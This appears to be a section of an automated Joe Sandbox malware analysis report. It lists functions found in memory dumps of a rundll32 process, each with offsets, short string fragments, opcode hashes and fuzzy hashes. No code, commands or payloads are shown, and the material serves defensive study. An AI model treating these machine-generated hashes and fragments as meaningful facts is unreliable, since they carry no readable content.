                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: |7et
                                                                                                                                                                                                                                          • API String ID: 0-1852512746
                                                                                                                                                                                                                                          • Opcode ID: 47ced32b0f5272efc7c0f5e49e3df1395f7b23477d35f065b7522d2a0a62206b
                                                                                                                                                                                                                                          • Instruction ID: 88634205fad7e1380e262cc8076a4903d82c7e76d1ac2250a12def08213f99bd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47ced32b0f5272efc7c0f5e49e3df1395f7b23477d35f065b7522d2a0a62206b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB519C74B002159FCB10DF69C494AAEBBF2FF88321B158569E4059B391EB30FD05CB81
                                                                                                                                                                                                                                          Function 04C3C4D8 Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (q
                                                                                                                                                                                                                                          • API String ID: 0-2414175341
                                                                                                                                                                                                                                          • Opcode ID: fc64c0143e81a3b49242c27b726c14f6209b47dc24006f25560396bd2ab4c62a
                                                                                                                                                                                                                                          • Instruction ID: 7665bebf49093bc66ee31ad98319d4370fd21e23a50ee5e900571cd15e556afe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc64c0143e81a3b49242c27b726c14f6209b47dc24006f25560396bd2ab4c62a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8151C0363047418FD325DB29D454A2ABBF2AFC5301B18CAA9D44A8B666DA34FC06CB91
                                                                                                                                                                                                                                          Function 04C3E428 Relevance: 1.4, Strings: 1, Instructions: 131COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (Aq
                                                                                                                                                                                                                                          • API String ID: 0-165228061
                                                                                                                                                                                                                                          • Opcode ID: e1882fbd7ff832d6baa78ae9f97d0c3508d0fd5c73210b5f81e8c40999350d09
                                                                                                                                                                                                                                          • Instruction ID: 4e3360881c36ed0d2b8551bc21805ae75b998cd0a5c5af9462586fd21b85cb5a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1882fbd7ff832d6baa78ae9f97d0c3508d0fd5c73210b5f81e8c40999350d09
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E416D74B102149FDB14DFA9D954AAEBBF2FF88215F144169E402AB390EF34AD01CF91
                                                                                                                                                                                                                                          Function 04C3E7C7 Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: L<et
                                                                                                                                                                                                                                          • API String ID: 0-2450853546
                                                                                                                                                                                                                                          • Opcode ID: 60b1505c442d67bcd0532a5cded8feff26d42dba9ba445328840d671b051a6ac
                                                                                                                                                                                                                                          • Instruction ID: 3592833c9e5f1f5b79a9bbff021dc0a18574226838351cfec47b9b01be9cd443
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60b1505c442d67bcd0532a5cded8feff26d42dba9ba445328840d671b051a6ac
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD416D35B002048BCB04DFA9D854BAEBBF6BF89611B248529D442EB394DF74AD058BA1
                                                                                                                                                                                                                                          Function 04C385B0 Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (q
                                                                                                                                                                                                                                          • API String ID: 0-2414175341
                                                                                                                                                                                                                                          • Opcode ID: f7bd0264ee715b0cfd05877a529c68b14243981881291d157b1c199948a925ea
                                                                                                                                                                                                                                          • Instruction ID: d7162f2a60451cb9a12822c2c7ce75b49f35b6f98783f43b7f89da25bf93648b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7bd0264ee715b0cfd05877a529c68b14243981881291d157b1c199948a925ea
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15418E74A006058FDB14DF29C480A6AB7F3FF89315B158A69E456AB351CB30F941CB64
                                                                                                                                                                                                                                          Function 04C34E48 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 4'q
                                                                                                                                                                                                                                          • API String ID: 0-1807707664
                                                                                                                                                                                                                                          • Opcode ID: 0680de5beb8b4bbd1d608ee7efc48dcba42f79ecbcc389c128cc9485969d8ff2
                                                                                                                                                                                                                                          • Instruction ID: 08462e4a0969a81ea30ee5bed1746c2207375ce4cc5a39b30182a6d13a5fc48a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0680de5beb8b4bbd1d608ee7efc48dcba42f79ecbcc389c128cc9485969d8ff2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D431B038B003099FDB14DF68D880ADEB7A2FFC8215B148659E5048F315DB30F906CB95
                                                                                                                                                                                                                                          Function 04C34EB2 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 4'q
                                                                                                                                                                                                                                          • API String ID: 0-1807707664
                                                                                                                                                                                                                                          • Opcode ID: 2fc7a18c8cce1823c0e4e398ebc3b495d69264fdea7e99aad6cea41967a11178
                                                                                                                                                                                                                                          • Instruction ID: 01efda4f0375957e356e6ab46af32e7f7ddb5a2f5a3a6633b4f626ac45da57bc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fc7a18c8cce1823c0e4e398ebc3b495d69264fdea7e99aad6cea41967a11178
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8231A1387013099FDB14EF68D880A9EBBB2FFC8215B148599E8048F355DB30F906CB95
                                                                                                                                                                                                                                          Function 04C33719 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: LRq
                                                                                                                                                                                                                                          • API String ID: 0-3187445251
                                                                                                                                                                                                                                          • Opcode ID: b05fc306c670f0bd8daf59e9426c4c353c1d773760667f5f0235bc92cafc1284
                                                                                                                                                                                                                                          • Instruction ID: 7d09d2dd4b4813dece0ef529831fae24961f53296ce3d5b5582c5d5bc61d62a7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b05fc306c670f0bd8daf59e9426c4c353c1d773760667f5f0235bc92cafc1284
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D621E2717002909FDB14CE29994477F3BA7EFC521AF14442EE806C72A5EB34EA058751
                                                                                                                                                                                                                                          Function 04C345C8 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (q
                                                                                                                                                                                                                                          • API String ID: 0-2414175341
                                                                                                                                                                                                                                          • Opcode ID: caaba3248011c87153125961963ff861c7dae767137ed38279d1e70424fe26db
                                                                                                                                                                                                                                          • Instruction ID: 8a9bdad9e95ce14330ff76cf03149eee3cc156acfac426b6c01e7455d71b748e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: caaba3248011c87153125961963ff861c7dae767137ed38279d1e70424fe26db
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B72103397042008FEB18DB2DE44496E77E7EFC921131940A9E64ACB352DE24EC03CB95
                                                                                                                                                                                                                                          Function 04C3AAA7 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: n
                                                                                                                                                                                                                                          • API String ID: 0-2013832146
                                                                                                                                                                                                                                          • Opcode ID: 2a582a61d325a8f4cde122678ffb0f24bc2708bf98ee69caa5feb76f7bc47122
                                                                                                                                                                                                                                          • Instruction ID: 77dd5f0a6ec29e2fcabbb5d264a3ee64e2cae405b547709b227ab13bfcacf0f8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a582a61d325a8f4cde122678ffb0f24bc2708bf98ee69caa5feb76f7bc47122
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA21A374E053499FDB01EFB4D450AADBFB2AF4A214F0001DAD885EB352DB34AA45CB82
                                                                                                                                                                                                                                          Function 04C3AF10 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: \;q
                                                                                                                                                                                                                                          • API String ID: 0-705206692
                                                                                                                                                                                                                                          • Opcode ID: 8897cbfda0ec242266dc62caaa79bacc8c922bae4e953012d7d4afcfa46afa50
                                                                                                                                                                                                                                          • Instruction ID: 5dbb7a0a7c5c5268908a0a6d8fdf981268a1cffb4619e30a4940b6ae42162c83
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8897cbfda0ec242266dc62caaa79bacc8c922bae4e953012d7d4afcfa46afa50
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 731170727042054FAB249BAEA484A5FB7DBEFC8269314813AF50EC7754DE65EC024394
                                                                                                                                                                                                                                          Function 04C35F48 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: LRq
                                                                                                                                                                                                                                          • API String ID: 0-3187445251
                                                                                                                                                                                                                                          • Opcode ID: 7964def606e062b88dcb1d2a61e282c054c8e397527fc327c05a60e4eee09220
                                                                                                                                                                                                                                          • Instruction ID: 568520dd0bd351ebd6640f8e6c495d5b400a32e7ba1de103f56b4401be92a454
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7964def606e062b88dcb1d2a61e282c054c8e397527fc327c05a60e4eee09220
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A218434B00208AFC7149B69C455AADBBF6FF8C610F148059E506AB390DF756D01CF94
                                                                                                                                                                                                                                          Function 04C35F46 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: LRq
                                                                                                                                                                                                                                          • API String ID: 0-3187445251
                                                                                                                                                                                                                                          • Opcode ID: 571bf6b8dbbb6b8912f0feecac53a34de5598f5fb2816ae3c7c8aa84d00a41d6
                                                                                                                                                                                                                                          • Instruction ID: c294452926c71556c32448813e28a4d9df11a87a25dec59e9565a3d1d89fc152
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 571bf6b8dbbb6b8912f0feecac53a34de5598f5fb2816ae3c7c8aa84d00a41d6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3219334B00104EFC7149B69D455AAE7BF6FF8C611F15801AE406EB3A0DF746D018F94
                                                                                                                                                                                                                                          Function 04C33370 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: fq
                                                                                                                                                                                                                                          • API String ID: 0-2523619172
                                                                                                                                                                                                                                          • Opcode ID: 7776e17392809d2e5ec17f321a16efbee5bc5076a79222c86da175bb4e569e18
                                                                                                                                                                                                                                          • Instruction ID: a93accfd07bc4a76aeb9f243473f4df37d394c9d2ae374d2ca1c9a331e0d0ea9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7776e17392809d2e5ec17f321a16efbee5bc5076a79222c86da175bb4e569e18
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7118635B012189FCB48AFA59845AAF7FAAFBC8350B15802AF909C7250DE358D1697D0
                                                                                                                                                                                                                                          Function 04C30C1C Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (q
                                                                                                                                                                                                                                          • API String ID: 0-2414175341
                                                                                                                                                                                                                                          • Opcode ID: ae99db22999f878ae75713a5f7a922ebf390aebb7e29ea1c73bc3ead1eb14d6a
                                                                                                                                                                                                                                          • Instruction ID: 74b82e5e8db6ec32f7488d9b6d550c2e44b4540c406edb908046387ac77f8e24
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae99db22999f878ae75713a5f7a922ebf390aebb7e29ea1c73bc3ead1eb14d6a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68110231B042144FF718AB7988243AF7AE79BC9702F19846AD106F7385CE346D0587AA
                                                                                                                                                                                                                                          Function 04C33380 Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: fq
                                                                                                                                                                                                                                          • API String ID: 0-2523619172
                                                                                                                                                                                                                                          • Opcode ID: fcc231d661ed2f7f9a9a269a9ceedb52a6ce4f64a3f60cfac9219a9329573873
                                                                                                                                                                                                                                          • Instruction ID: 57de61a8c08a04085da568bc849bda31546a1a9325a8e1f9e0c54ef033daac9d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fcc231d661ed2f7f9a9a269a9ceedb52a6ce4f64a3f60cfac9219a9329573873
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31118275B002085FCB08ABA99845A7F7FAAFBC8350B04802AF909D7340DE388D028BD0
                                                                                                                                                                                                                                          Function 04C357B8 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (q
                                                                                                                                                                                                                                          • API String ID: 0-2414175341
                                                                                                                                                                                                                                          • Opcode ID: 8652c69a32f533f55dfd01770d981d4a2d2ff6129c65884b3884d01f0a0b67fb
                                                                                                                                                                                                                                          • Instruction ID: d9c9cdfa9ee0c3f63c58433a20730d222c3cad94e4bc1ee3bf85869aa55bfc78
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8652c69a32f533f55dfd01770d981d4a2d2ff6129c65884b3884d01f0a0b67fb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F01D4343043004FE719AB39D860A6E3BD39FC915071845A9D149CF751DE25EC478355
                                                                                                                                                                                                                                          Function 04C3EA75 Relevance: 1.3, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: T;et
                                                                                                                                                                                                                                          • API String ID: 0-49768287
                                                                                                                                                                                                                                          • Opcode ID: ef92fc80c1b745cdae8fd3589757c89bf18fbe905bb72731fb385024bc23a3db
                                                                                                                                                                                                                                          • Instruction ID: 506361d6097242c582096063a57b6e519b7e52f6d212be2c3305041c398da86f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef92fc80c1b745cdae8fd3589757c89bf18fbe905bb72731fb385024bc23a3db
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2F024363093010FC301462DC89096AFBFAEFCA62032900A7D104C7362EE29ED068762
                                                                                                                                                                                                                                          Function 04C399A8 Relevance: .3, Instructions: 298COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f642331286429ba58143c0c58ab906634e012d079eb14868be145affe83dfe00
                                                                                                                                                                                                                                          • Instruction ID: bab3d5ab9a0634224dc54469dc435a4aca63dcaa5034974658025f1d9cc1a33f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f642331286429ba58143c0c58ab906634e012d079eb14868be145affe83dfe00
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0ED13A74A003598FDB15CFA8C884A9DBBF2FF89301F158295D848AB365DB74EE45CB50
                                                                                                                                                                                                                                          Function 04C3ABA0 Relevance: .2, Instructions: 186COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5eaf16cf53746e2a541df86a5fe27123525417cd8e59f487a76402df52c8e382
                                                                                                                                                                                                                                          • Instruction ID: 9a202542e234d61a95ccaf0cf1431890a1a4778eb0775f766e79cc5141999b77
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5eaf16cf53746e2a541df86a5fe27123525417cd8e59f487a76402df52c8e382
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD5103347005118FDB189F2ED498A2A77E7BFC9B1232981A9E446CB371EE76EC119B40
                                                                                                                                                                                                                                          Function 04C35482 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2c0aa674b857cf7c7ac5a0671784f537b45244e47638790101f6d74df0e71f34
                                                                                                                                                                                                                                          • Instruction ID: 09db96063d562e1ecc7445fed2ddfad879b188388e696f583fcc2cdfffe8b63f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c0aa674b857cf7c7ac5a0671784f537b45244e47638790101f6d74df0e71f34
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF513B78E00309AFDB04EBE4D855AAEBBB2FFC8211F104559E5126B790CF352D16DB61
                                                                                                                                                                                                                                          Function 04C334A8 Relevance: .1, Instructions: 141COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d67b4acba3593166a22e1ed87576b93d11fd0afaeec975c9f7c22b6a8cc0a4d5
                                                                                                                                                                                                                                          • Instruction ID: cf08f2441aeb40c29143296d5cbb5a4d2e38a3a5085530f0364c740c93639012
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d67b4acba3593166a22e1ed87576b93d11fd0afaeec975c9f7c22b6a8cc0a4d5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1951AC787013059FCB05EBA8E890AAEBBA7EBC42007049769D4098F759DF74BD0B87D1
                                                                                                                                                                                                                                          Function 04C334B8 Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 37c7f377a38cc93e3dae9962d262fe013f36760510e7e78bbf4fedceea69df82
                                                                                                                                                                                                                                          • Instruction ID: e1874a0dfbd4a8876027926a06ace8f8e2de6a47f04402193e45ba2b0d478222
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37c7f377a38cc93e3dae9962d262fe013f36760510e7e78bbf4fedceea69df82
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21518D787013059FCB05EBA8E990A6DBBA7EBC42107049729E4098F748DF70BD0A87D1
                                                                                                                                                                                                                                          Function 04C3B4F7 Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
